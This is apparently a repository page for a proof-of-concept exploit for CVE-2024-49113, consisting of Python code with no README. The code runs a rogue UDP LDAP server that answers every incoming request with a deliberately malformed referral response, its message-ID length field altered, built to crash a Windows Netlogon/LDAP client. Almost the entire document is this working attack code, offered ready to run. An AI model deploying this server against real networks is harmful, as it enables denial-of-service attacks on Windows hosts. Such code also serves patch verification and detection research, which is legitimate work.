README.md
README.md not found for CVE-2024-49113. The file may not exist in the repository.
import asyncio
from logger import logger
from ldaptor.protocols import pureldap
from ldaptor.protocols import pureber
REFERRAL_RESULT_CODE = 10
class LDAPSearchResultDoneRefferal(pureldap.LDAPSearchResultDone):
def toWire(self):
elements = [
pureber.BEREnumerated(self.resultCode),
pureber.BEROctetString(self.matchedDN),
pureber.BEROctetString(self.errorMessage),
]
if self.resultCode == 10: # LDAP referral result code
if self.referral:
elements.append(
pureber.BERSequence(
[pureber.BEROctetString(url) for url in self.referral],
tag=0xA3 # Context-specific tag for referral
)
)
if self.serverSaslCreds:
elements.append(pureldap.LDAPBindResponse_serverSaslCreds(self.serverSaslCreds))
return pureber.BERSequence(elements, tag=self.tag).toWire()
def get_malicious_ldap_packet(message_id: int, lm_referral: int=2) -> bytes:
"""
Build a malicious LDAP response packet with a referral.
The packet has the following structure:
Result code: 10 (LDAP referral)
Referral: ldap://referral.com (valid LDAP URL)
Message ID: 4 bytes (big-endian) - the same as the original request with lm_referral value.
"""
if lm_referral == 0 or lm_referral > 255:
raise ValueError("lm_referral must be between 1 and 255")
if lm_referral & 1:
raise ValueError("lm_referral must be an even number")
ldap_search_result = LDAPSearchResultDoneRefferal(resultCode=REFERRAL_RESULT_CODE, referral=['ldap://referral.com'])
ldap_response_message = pureldap.LDAPMessage(value=ldap_search_result, id=message_id)
bytes_to_send = ldap_response_message.toWire()
lm_referral_length_index = bytes_to_send.index(b"\x02\x01") + 1
message_id_byte = bytes_to_send[lm_referral_length_index + 1].to_bytes(length=1, byteorder='big')
bytes_to_send = (
bytes_to_send[:lm_referral_length_index] # Everything before the message ID
+ b"\x04" # Type and Length of the message ID
+ lm_referral.to_bytes(length=1, byteorder='big') # encoded lm_referral
+ b"\x00\x00" # Padding
+ message_id_byte # Message ID
+ bytes_to_send[lm_referral_length_index + 2:] # Rest of the packet
)
new_packet_length = bytes_to_send[1] + 3
bytes_to_send = bytes_to_send[0:1] + new_packet_length.to_bytes(length=1, byteorder='big') + bytes_to_send[2:]
return bytes_to_send
class LdapServerProtocol(asyncio.DatagramProtocol):
def __init__(self):
super().__init__()
self.berdecoder = pureldap.LDAPBERDecoderContext_TopLevel(
inherit=pureldap.LDAPBERDecoderContext_LDAPMessage(
fallback=pureldap.LDAPBERDecoderContext(
fallback=pureber.BERDecoderContext()
),
inherit=pureldap.LDAPBERDecoderContext(
fallback=pureber.BERDecoderContext()
),
)
)
self.transport = None
def connection_made(self, transport: asyncio.DatagramTransport) -> None:
self.transport = transport
logger.info(f"NetLogon connected")
def datagram_received(self, data: bytes, addr) -> None:
# Parse the received data
ldap_message, _ = pureber.berDecodeObject(self.berdecoder, data)
logger.info(f"Received LDAP request from NetLogon {addr}")
# Build the "vulnerable" response packet
vulnerable_ldap_packet = get_malicious_ldap_packet(ldap_message.id)
logger.info(f"Sending malicious LDAP response packet to {addr}: {vulnerable_ldap_packet}")
# Send back to client
self.transport.sendto(vulnerable_ldap_packet, addr)
def connection_refused(self, exc) -> None:
logger.error(f"Connection refused: {exc}")
def error_received(self, exc) -> None:
logger.error(f"Error received: {exc}")
async def run_exploit_server(listen_port: int):
loop = asyncio.get_running_loop()
transport, _ = await loop.create_datagram_endpoint(
lambda: LdapServerProtocol(),
local_addr=('0.0.0.0', listen_port)
)
try:
# Keep the server running forever (until Ctrl-C or you close the loop).
await asyncio.Future()
except KeyboardInterrupt:
pass
finally:
transport.close()
logger.info("Server has been shut down.")